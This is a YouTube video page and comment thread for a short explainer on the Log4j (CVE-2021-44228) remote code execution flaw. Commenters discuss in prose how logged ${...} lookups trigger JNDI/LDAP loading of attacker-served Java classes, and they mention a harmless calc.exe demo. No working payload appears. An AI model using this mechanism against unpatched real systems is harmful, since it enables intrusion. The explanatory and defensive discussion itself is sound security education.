Log4j (CVE-2021-44228) RCE Vulnerability Explained
Рет қаралды 315,533
2 жыл бұрынWalking through how the log4j CVE-2021-44228 remote code execution vulnerability works and how it's exploited.
@_JohnHammond 2 жыл бұрын
Great demonstration, Marcus!
@anuzravat 2 жыл бұрын
U got 1 subscriber
@seppy624 2 жыл бұрын
hey john
@Clytax 4 ай бұрын
@@anuzravatMore like 1.2million
@mint530 2 жыл бұрын
You saying "just came out a few days ago" makes it sound like a fun new game just got released haha
@MalwareTechBlog 2 жыл бұрын
Yeah lol, I just realized that 😂
@techutility 2 жыл бұрын
🤣🤣🤣🤣🤣
@-bubby9633 2 жыл бұрын
Tbf for us security professionals this is basically like a new game was just released 😂
@dipankarmitra3334 2 жыл бұрын
@@-bubby9633 🤣🤣🤣
@OmprakashYadavIIT 2 жыл бұрын
😂😂
@devinmagee1948 2 жыл бұрын
It's my first week working in cyber security environment professionally. Trying to get a grasp on my organization's infrastructure while trying to help with the log4j vuln has been a real trial by fire lol. Always enjoy your content!
@complexedone 2 жыл бұрын
I understand. I just joined a new org as part of the infrastructure team. I still don't know all our systems, but I'm learning fast as I help to find and patch systems as needed/available.
@jasrid04 2 жыл бұрын
Welcome to the industry and good luck!
@devinmagee1948 2 жыл бұрын
@@complexedone Good Luck. We will get there eventually!
@manfrombritain6816 2 жыл бұрын
what have you been doing to help? what's your role? i'm looking to start in security soon!
@jdemuro1 2 жыл бұрын
Best way to learn quickly though. This is a blessing in disguise for you!
@ltsmash9544 2 жыл бұрын
I love how you actually demonstrate the vulnerability and not just talk about it, like what most others are doing. Keep it up mate, you've got my Subscribe!
@zedzpan 2 жыл бұрын
Yup, learnt more from this than the over engineered blogs I've been tracking!
@slaloulin8289 2 жыл бұрын
not to mention how he only did it in ~3 mins, saves a lot of times for such a great explanation
@brianrdetweiler 2 жыл бұрын
Clicking various links for 30 minutes, trying to understand the issue, and you explain it in less than 4. Thank you!
@badashgr8 2 жыл бұрын
With videos out there in 20+ mins and you here with less than 4 mins explaining it so clearly, I know which video to click from next time.
@AlphaZeroOmega 2 жыл бұрын
Thanks Marcus. I appreciate your ability to explain a vulnerability like this and demo it in a really understandable way.
@romanxyz7248 2 жыл бұрын
I had problem understand this from days and you explained it under 4 mins. You're amazing Marcus 👏❤️
@masettyvivek8155 2 жыл бұрын
This is one of the great demonstrations I have listened on KZfaq. You are amazing!!
@andresromerodev 2 жыл бұрын
This explanation is so cool! I’ve been hearing about the vulnerability but nobody took the time to explain it this way. Thank you! :)
@Swing17 2 жыл бұрын
Very well explained. Good video Marcus!
@abhilpnYT 2 жыл бұрын
One of the best explanations with practical demo. Thank you ..
@sniGGandBaShoR 2 жыл бұрын
the variable thing in a string is called string interpolation my dude!
@Svalbaz 2 жыл бұрын
I work in IT and the last week or two has been absolutely mental thanks to this
@lofman 2 жыл бұрын
"versatile" is the key word for this vulnerability. thanks for explaining! :)
@calmeidazim 2 жыл бұрын
Thank You Marcus, simple but quiet clear to understand
@DavisTibbz 2 жыл бұрын
First time understanding what this means. Thanks.
@BSwitchGTG 2 жыл бұрын
Just started a new job, and moved my support area from networking to applications. Day 1 of the new gig and I was hearing it was an all-hands to deal with the "new vulnerability". Thankfully new enough that there was no headache for me to deal with, but oof, glad to see what they were up against!
@Burgundy_towel 2 жыл бұрын
Thanks for such layman explanation, I was able to grasp it..
@AM-og2oi 2 жыл бұрын
thank you for this video marcus!!! alot of news on this and this has helped me out get a better understanding of how the vulnerability functions
@53kt0r 2 жыл бұрын
Great video! plain, simple and without bias.
@zaitarh 2 жыл бұрын
The ${…} syntax is not part of Java - it’s solely a Log4j syntax. (If it were part of java there would have been no problem, as it would have been evaluated at compile-time, not run-time)
@marcellkovacs5452 2 жыл бұрын
@@kpaxxapk6397 the logger should sanitise the input the same way an ORM sanitises model insance lookups to avoid SQL injection.
@zaitarh 2 жыл бұрын
@@kpaxxapk6397 In theory, it's a fair point - it certainly would be possible to sanitize it. But 1) the documentation did not state this anywhere afaik and 2) no one is interested in having a logging framework where you have to sanitize everything. People just want to do "log.error("My error: {}", error)" and be done with it. I've used Log4j before some years ago, and never knew about that "Lookup" feature - and aparently i was not the only one. :) Imho, it was a very annoying feature, security flaw or not, as i don't want the text i log to sometimes be transformed into something else, just because it happens to contain "${" and "}"... And this undesirable feature was enabled by default...
@zaitarh 2 жыл бұрын
@@kpaxxapk6397 Note: It would kind of be possible for Log4j to sanitize it itself... If they forced you to use it in a specific way... You CAN (but don't have to) use the logger as having a format string as first param, and then data-values for the rest of the params (similar to printf, etc)..: log.info("This is the format string. Data is {} and {}", data1, data2);
@fox2code 2 жыл бұрын
@@zaitarh This RCE was a feature, not a bug, I saw the code, it was done intentionally, I'm sure someone added this feature on purpose to use it for what the video showed us.
@reemontel8036 2 жыл бұрын
No idea why I always assume the ${...} syntax is Spel from the spring spell syntax but I'm not 100% sure if that's correct or not
@kosmonautofficial296 2 жыл бұрын
Always cool to see a Marcus video out on a new vuln!
@strato_5459 2 жыл бұрын
good explination. told exactly what it is and how it works. yeah i know what im looking at already but for anyone else that has no idea, this is the video they should watch
@YourWaifu0 2 жыл бұрын
Nice explanation, I believe showing how easy it is to do is the scary part more than anything since a lot of applications use log4j.
@tapion1998 2 жыл бұрын
I can't believe that it is that simple. The first thing you learn is always to control the input that is given. That is why you wont just take the given SQL command and execute it. To think that log4j didn't sanitise their input ist just CRAZY. That's a one liner, my god...
@razzeeee 2 жыл бұрын
Best summary yet
@GGdevelopment 2 жыл бұрын
Great job at presenting the vulnerability!
@DalBileAbas 5 ай бұрын
Thanks for simplifying the vulnerability
@das_evoli 2 жыл бұрын
Finally no bullshitting around. Straight to the point and understandable for every novice programmer
@kotiwa 2 жыл бұрын
You made this very easy to understand. thanks!
@metrixc 2 жыл бұрын
Hi Marc, great video. If I see it right, the outbound connections to e.g. a LDAP server is always unencrypted since JNDI does regular (unencrypted) lookups. That means that companies could look for unexpected outbound LDAP requests to servers on the internet right? Just curious. Would there be a way to make these outbound requests encrypted? Thank you!
@yodamaxwell 2 жыл бұрын
Fantastic demonstration!
@edgay 2 жыл бұрын
This 4 minute video was more clear and valuable then the 30minute one i just watched on this rce
@edgay 2 жыл бұрын
cough johnhammond cough
@FloresMenyapa Жыл бұрын
Greetings from Indonesia, I really admire you, and you are great. I'm just a beginner who wants to learn like you from the bottom
@TheBenJiles 2 жыл бұрын
Simple. To the point. Thanks man
@anonymous6666 2 жыл бұрын
great explanation and demo
@chess598 2 жыл бұрын
Concise and to the point, thanks!
@pjj1947 2 жыл бұрын
Thanks Marcus! Sweet and clean explanation!
@willemachternaam690 2 жыл бұрын
'Drop bobby tables' for Java. Nice! Thank you for this.
@jasonOfTheHills 2 жыл бұрын
Great explanation. And wow.
@imkir4n 2 жыл бұрын
clean explanation marcus!
@xl8373 2 жыл бұрын
Great demonstration , thank you !
@DaraulHarris 2 жыл бұрын
Subbed. That was an excellent explanation.
@mdzen22e Жыл бұрын
just what am looking for....thx dude
@01071985hh 2 жыл бұрын
impactful explanation thanks
@manideepkumar959 2 жыл бұрын
Better than java brains log4j explanation,now i understand
@TreeFrogOnATree 2 жыл бұрын
well, well that's really interesting thanks for uploading!
@TheGameIsOverCy 2 жыл бұрын
Nice explanation ! Thank you :)
@freekdeman 2 жыл бұрын
Thanks, really helpful.
@ndenkha 2 жыл бұрын
Great video. Question, so is the problem that even though log4j stores that command string in a log file it gets executed while being written to the file?
@victorburnett6329 2 жыл бұрын
Wow, that is a pretty glaring vulnerability. Amazing it's only just been discovered.
@wcsoutdoors1393 2 жыл бұрын
I love your videos
@andreasMou123 2 жыл бұрын
nice demo, thanks!
@EnglishRain 2 жыл бұрын
Thank you for this!
@florian538 2 жыл бұрын
Could you solve this issue by looking for an outcommenting the feature in the log4j library?
2 жыл бұрын
thanks for the explanation, going to make a documentary on this!
@tansanwastaken 2 жыл бұрын
Purchased botted sub account, ratio
@mandokir 2 жыл бұрын
Great, a whole documentary nobody asked for.
@kingKabali 2 жыл бұрын
Right to the point. Thanks man.
@tinkleondabeach 2 жыл бұрын
Thx daddy great explanation
@BirgerBurgerBargir 2 жыл бұрын
Great video
@cool-aquarian 2 жыл бұрын
when I try to do same thing in my eclipse using log4j < 2.16, the jndi url is not getting invoked. It is simply printing in log message.. Any clue why ?
@krizanand 2 жыл бұрын
Pretty much every security team in an organization is stuck on log4j meeting 😜 Wonderful explanation though of the exploit.
@paulkelly5618 2 жыл бұрын
Awesome video! Quick question: What is the symbol you have on line 11 of your code just after "logger.error(" but before "Hello..."
@corv882002 2 жыл бұрын
It says "s:" and is inserted by the ide to let you know what the parameter's called
@philipjfry4465 2 жыл бұрын
parameter hinting
@thelineidk 2 жыл бұрын
And if I go to 2b2t from my phone, for example, will the exploit work on me? (I play java minecraft on my phone)
@redwaller1 2 жыл бұрын
Words cannot describe- how did this slip unnoticed? I cannot imagine writing code that would result in behavior like this, and yet it must surely be a trap even experienced developers might fall into.
@maxwellmapako3820 2 жыл бұрын
I honestly believe that you cannot cater for what you don't expect 🤣
@jayit6851 2 жыл бұрын
@@maxwellmapako3820 This is like a classic example of unsanitized input. Idk how any experienced developer like those working with the Apache Foundation couldn't expect that.
@user-do6gr5ww5e 2 жыл бұрын
I was just thinking - this seems adjacent to our classic case of SQL injection. Crazy
@thexlr8rkid 2 жыл бұрын
This video is perfect
@WhiteSiroi 8 ай бұрын
thank you, very heplful
@valentinpopescu6704 2 жыл бұрын
How can you set up the LDAP server on localhost and which port to choose?
@losthedgehog3922 2 жыл бұрын
Great. Now show the LDAP server configuration and how exactly it serves the java object payload. None of the videos seem to explain how that works. They either evade it or use marshalsec LDAP server also never explaining how it works.
@peter11256 2 жыл бұрын
Great explanation. I just didn't quite understand one thing. Is it necessary for the object you are loading to exist in the ldap server ?
@isomeme 2 жыл бұрын
Yes, but as the attacker can point the lookup to an ldap server they control, that's easy to arrange.
@Glitchflim 2 жыл бұрын
How to fix the issue any steps are there
@melkileo 2 жыл бұрын
It's quite a good video but I think you should have talken about the jndi/ldap breach that enable rce. Jndi/ldap basically doesn't allow to inject malicious code, but a breach form 2017 make it possible to inject and initialize a custom Java class the ldap server redirects to
@patco258 2 жыл бұрын
Great great great video
@ewerybody 2 жыл бұрын
Wasn't the base64 an extra indirection? The class you're loading can't pop Calc.exe directly? 🙄
@susulemons 2 жыл бұрын
how does an attacker make the call in the first place though? (have access to call the function with the string
@MalwareTechBlog 2 жыл бұрын
By controlling some input that gets logged by the application
@logicfirst7959 2 жыл бұрын
You are the man Marcus, one thing though, how can i emulate this into my environment, I tried your commands and getting Error: Could not find or load main class Main error.
@majorassault5074 2 жыл бұрын
I have to ask, what happens if you are running a VPN? Will the VPNs server get infected with whatever malware/ransomware/trojan/ddos/worm a black hat sends their way?
@freddyfozzyfilms2688 Жыл бұрын
Can u also input a lambda?
@chickendumpling9595 2 жыл бұрын
I know I’m late to the party but I would greatly appreciate it of someone could clarify some things for me: 1) that error at the end, I cant quite catch it but I figure it must be due to the fact that the downloaded object cannot be concatenated without a toString method or something like that? 2) Isnt that base64 ‘calculator.exe’ just a directory on your server, not part of the actual object? 3) what is that on line 8? Is setting that property necessary for this exploit to work? Again, I appreciate highly any response :)
@rommeljoven1046 2 жыл бұрын
Thanks for the demo. May i know what will be the parent process of "calc.exe"? would it be "java.exe"?
@MalwareTechBlog 2 жыл бұрын
Yup, it'll be the java VM
@bagzhansadvakassov1093 2 жыл бұрын
I wonder how many 0-day expoits out there in the open software.
@djvex6180 2 жыл бұрын
Thank you so much.
@tuananhtass3693 2 жыл бұрын
tks, Marcus!
@hellboykuro 2 жыл бұрын
hi can anyone help me when i try to inject any executor in any game it says "This exploit is down while critical ace/rce vuln is fixed" this is on roblox btw
@danielblanchette8593 2 жыл бұрын
So you're telling me that the Log4j vulnerability is roughly the same as there was with linux a while ago where if you put something like [{:}};} (don't remember the exact spelling) you can then enter a command that can be executed from an app or the other thing that happened to twitter where you could send a tweet that would retweet itself in your browser... Why is it always the same vulnerability that is found?
@MemesandLeague 2 жыл бұрын
@marcus Hutchins, I recently used your strategies from the pd64.exe video to dump some embedded dlls from a Trojan google chrome installer. Thanks for all the guidance!
@EdwardInTX Жыл бұрын
thank you!
@BruceDuncan 2 жыл бұрын
I still don't get it. What is it that is being returned over LDAP? Is it the base64-encoded string "calc.exe"? Is it a Java object which is doing Runtime.getRuntime().exec("calc.exe")? It's been nearly a week and I still don't get it!
@Robert-pt2jz 5 ай бұрын
Hello, i am just curious. I have a statement and would like to know if my logic is correct. The vulnerability is caused due to no input checking in the program, allowing unintentional interaction with the user? Is this a correct way to view this or am i way off base?
@MH-oc4de 2 жыл бұрын
To be clear, it's the log4j logger that is doing the ${variable} expansion, and not the shell (?) e.g., if you print out username within the code it is not a problem, but log4j is (somehow) executing it ? Thanks!
@MalwareTechBlog 2 жыл бұрын
Correct
@patrickmcevoy1776 2 жыл бұрын
Isn't 1.8 not vulnerable from the exploit though?
@universalperson 2 жыл бұрын
I actually worked with programs that use log4j, and found it clunky and cumbersome to use with the programs I was delevoping. I didn't know it was so widespread. So is this bug like that xckd comic about Robert"); Drop Tables Students? Because it sounds like it.
@MolOlsson 2 жыл бұрын
More like xkcd 2347: Dependency. All modern infrastructure is built on a project someone thanklessly maintains in their free time :( And this vuln vas known as far back as BlackHat 2016.
@demoniack81 2 жыл бұрын
How dooes one find log4j "cumbersome"? It's literally one jar and one .properties / .xml config file and off you go.
@universalperson 2 жыл бұрын
@@demoniack81 it's been a while so I forgot the details, but whatever logging setup we had just did not work properly when we updated log4j, and a lot of the log messages had to be rewritten or changed just so the files would be generated and logged to. And my company had this overly complicated standard that log messages had to follow but didn't quite tell us how to make it display properly with log4j - when the older system was already doing so. So many bugs that were "this log is not displaying the error message properly", and I'd have to track down and fix it because there was some variable that needed updating.
@Scholz23 2 жыл бұрын
What coding tool are you using here? What do you reccomend for people learning code? It's very interesting watching everyones reaction and discovery of this vulnerability.
@Joel-mx3oo 2 жыл бұрын
That’s IntelliJ ide
@zaitarh 2 жыл бұрын
Loooove IntelliJ
@nid274 2 жыл бұрын
if you learn with gedit and terminal you will be like Superman growing in Earth
@sergedeugoue2569 2 жыл бұрын
Maybe I'm overlooking things but it seems so obvious. How did this vulnerability take years to discover?
@sonalita_ 2 жыл бұрын
I'm still confused about how the jndi payload gets executed (i.e. calc.exe) in this case - isn't the jndi lookup just returning data? what is it that makes it actually execute calc.exe??? nobody seems to be able to explain this.
@arvidmildner6274 2 жыл бұрын
As I've understood it, it's basically a "hook" and the intended functionality of log4j which says: take this url, load the object/function there and run it. So the reason it is run is because that's how it was supposed to be. It's not the malicious code itself that says that it should be run. But I may be wrong here.
@53kt0r 2 жыл бұрын
To answer your question: yes. everything in here is data (even this video itself), eg: Y2FsYy5leGU= is calc.exe in base64, that is the resource is loading thru JNDI and passed it to the log4j logguer as a variable to be logged. I think that is clear enough, hopefully for you too. Cheers!
@lIlIllll1 2 жыл бұрын
what terminal thing are you using where you can see both the application code and terminal? (Im a noob dont yell LOL)
@nickpechie6951 2 жыл бұрын
thats the built in terminal in IntelliJ
@TeamEmperor 2 жыл бұрын
Thank you
@jackofnotrades15 2 жыл бұрын
Its not a part of java as somebody mentioned before. The syntax is kind of string interpolation though.
@CBMaster2 2 жыл бұрын
How has this just came out? Seems like a pretty straight forward exploit? Was it a new feature of log4j or something that has existed for a long time?
@jeremyFaden 2 жыл бұрын
Since 2013
@traxooza 2 жыл бұрын
Coming from a C++ background, I can't see why the code in "username" gets evaluated. Is it because log4j triggers this evaluation somehow ? Why would it do that ?
@scarletdice 2 жыл бұрын
correct, log4j evaluates the variable that is wrapped around by ${...} (its own syntax for string interpolation). That and combined by some remote JNDI lookup/mechanism within the library itself, a feature that they claimed were needed for backward compatibility purposes (??). Note that JNDI is a standard in Java that allows remote object load/lookup (!!).
Marcus Hutchins
Рет қаралды 17 М.